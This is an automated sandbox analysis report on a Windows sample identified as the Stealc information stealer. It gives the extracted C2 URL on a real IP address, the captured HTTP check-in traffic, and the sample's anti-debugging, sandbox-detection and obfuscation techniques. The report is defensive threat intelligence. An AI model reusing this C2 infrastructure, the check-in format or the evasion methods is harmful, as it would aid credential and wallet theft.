Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1533401
MD5:bf6de6e8d3ac5123b66ba93633affe66
SHA1:f5f047a51c8ffe5700542d6ea9517214d4f31725
SHA256:eb01ca908e0cad8310d771a3722cad18d9694c718c37ac5f363e476e1c1212de
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 7500 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BF6DE6E8D3AC5123B66BA93633AFFE66)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 7500JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 7500JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.670000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-14T17:18:15.099274+020020442431Malware Command and Control Activity Detected192.168.2.749708185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/wsURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.670000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0067C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00677240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00677240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00679AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00679AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00679B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00679B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00688EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00688EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006838B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006838B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00684910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0067DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0067E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00684570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00684570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0067ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0067BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0067DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006716D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006716D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00683EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00683EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0067F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0067F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49708 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 35 31 45 33 42 31 30 36 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="hwid"8D51E3B1064A563484146------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="build"doma------JJJDGIECFCAKKFHIIIJE--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00674880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00674880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJEHost: 185.215.113.37Content-Length: 210Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 35 31 45 33 42 31 30 36 34 41 35 36 33 34 38 34 31 34 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="hwid"8D51E3B1064A563484146------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="build"doma------JJJDGIECFCAKKFHIIIJE--
                Source: file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php(#
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpG
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpS
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.1367632682.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1367632682.000000000129E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37w

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C80_2_00A3E8C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A420330_2_00A42033
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A470010_2_00A47001
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0094705F0_2_0094705F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3311C0_2_00A3311C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A4AB890_2_00A4AB89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A403910_2_00A40391
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A34BF50_2_00A34BF5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EB3E40_2_009EB3E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FBB1A0_2_009FBB1A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A39B280_2_00A39B28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A48B630_2_00A48B63
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0097D4100_2_0097D410
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A455BF0_2_00A455BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00933D8F0_2_00933D8F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009CF5FE0_2_009CF5FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A366EA0_2_00A366EA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3CE690_2_00A3CE69
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006745C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: jmwhdghu ZLIB complexity 0.9950985609673024
                Source: file.exe, 00000000.00000002.1366369367.0000000000671000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1325704313.0000000004F30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00689600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00683720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00683720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\HJC3KWHD.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1847296 > 1048576
                Source: file.exeStatic PE information: Raw size of jmwhdghu is bigger than: 0x100000 < 0x19ce00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.670000.0.unpack :EW;.rsrc :W;.idata :W; :EW;jmwhdghu:EW;xkdnzbup:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;jmwhdghu:EW;xkdnzbup:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00689860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c72d0 should be: 0x1cb63c
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: jmwhdghu
                Source: file.exeStatic PE information: section name: xkdnzbup
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B560B4 push eax; mov dword ptr [esp], ebx0_2_00B560E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B560B4 push 3A63A3CAh; mov dword ptr [esp], edi0_2_00B56104
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B0E0A7 push eax; mov dword ptr [esp], edi0_2_00B0E0D7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC40B0 push 3149E5B7h; mov dword ptr [esp], edi0_2_00AC40E3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF208D push 3DD9B368h; mov dword ptr [esp], ebp0_2_00AF20C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF208D push 548164BCh; mov dword ptr [esp], esp0_2_00AF20D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB3886 push esi; mov dword ptr [esp], ebp0_2_00AB38B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB3886 push 072C594Fh; mov dword ptr [esp], ebp0_2_00AB3947
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE7083 push ebp; mov dword ptr [esp], edi0_2_00AE70AD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE7083 push 295CA6DAh; mov dword ptr [esp], ecx0_2_00AE7124
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE7083 push 2905F284h; mov dword ptr [esp], eax0_2_00AE714A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5508D push ecx; mov dword ptr [esp], 341B7306h0_2_00B55101
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF6092 push ebp; mov dword ptr [esp], eax0_2_00AF60B4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AF6092 push esi; mov dword ptr [esp], 0DC895E2h0_2_00AF6147
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2388C push 0EBC7D1Ch; mov dword ptr [esp], esi0_2_00B23923
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2388C push 7FD5EC80h; mov dword ptr [esp], ebp0_2_00B23955
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2388C push eax; mov dword ptr [esp], edi0_2_00B23980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068B035 push ecx; ret 0_2_0068B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push ebp; mov dword ptr [esp], 7FEDCD03h0_2_00A3E90D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push eax; mov dword ptr [esp], edx0_2_00A3E96A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push ebp; mov dword ptr [esp], 3E77AF57h0_2_00A3E96F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push 5A556219h; mov dword ptr [esp], eax0_2_00A3E9E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push esi; mov dword ptr [esp], ebx0_2_00A3E9FE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push 187109C1h; mov dword ptr [esp], eax0_2_00A3EA09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push 7B374E98h; mov dword ptr [esp], esi0_2_00A3EA26
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push edx; mov dword ptr [esp], ebx0_2_00A3EA7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push edx; mov dword ptr [esp], 1131DA9Eh0_2_00A3EB1F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push 6CD54B8Ch; mov dword ptr [esp], eax0_2_00A3EB45
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push 3C6801DFh; mov dword ptr [esp], ebp0_2_00A3EBB3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push edx; mov dword ptr [esp], eax0_2_00A3EC56
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3E8C8 push eax; mov dword ptr [esp], esp0_2_00A3EC67
                Source: file.exeStatic PE information: section name: jmwhdghu entropy: 7.9544342173463365

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00689860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00689860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13585
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2291 second address: 8D2296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D2296 second address: 8D229C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D229C second address: 8D22A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8D22A0 second address: 8D22A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4F468 second address: A4F474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0B44BD79ACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46B39 second address: A46B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C82h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46B4F second address: A46B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46B53 second address: A46B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46B60 second address: A46B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
